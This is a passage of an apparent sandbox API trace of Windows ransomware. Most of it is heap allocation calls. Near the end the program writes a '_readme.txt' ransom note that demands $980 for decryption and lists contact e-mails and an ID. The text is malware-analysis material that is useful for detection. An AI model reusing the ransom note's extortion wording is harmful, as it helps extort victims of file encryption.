RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.777] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.777] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.777] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.777] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.777] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.777] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.777] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.777] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.777] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.777] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.777] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.777] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.777] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.777] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.777] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.777] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.777] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.777] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.777] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.778] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.778] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.778] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.778] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.778] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.778] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.778] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.778] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.778] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.778] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.778] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.778] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.778] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.778] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.778] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.778] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.778] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.778] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.778] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.778] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.779] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.779] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.779] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.779] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.779] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.779] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.779] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.779] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.779] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.779] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.779] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.779] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.779] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.779] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.779] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.779] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.779] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.779] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.779] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.779] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.779] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.779] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.779] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.779] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.779] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.779] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.779] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.779] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.779] PathFindFileNameW (pszPath="C:\\Boot\\es-ES\\") returned="es-ES\\" [0090.779] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.779] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.779] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0090.779] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.779] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0090.779] PathFindFileNameW (pszPath="") returned="" [0090.779] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.780] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0090.780] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0090.780] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0090.780] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0090.780] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99ca4f0 [0090.780] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.780] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.780] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.780] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.780] FreeLibrary (hLibModule=0x75670000) returned 1 [0090.780] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.780] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0090.780] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.781] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.781] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x81c) returned 0x99ca4f0 [0090.781] PathAppendW (in: pszPath="C:\\Boot\\es-ES\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0090.781] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.781] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.781] PathFileExistsW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 0 [0090.782] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7d00) returned 0x99f52d8 [0090.782] lstrcpyW (in: lpString1=0x99f52d8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" [0090.782] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is 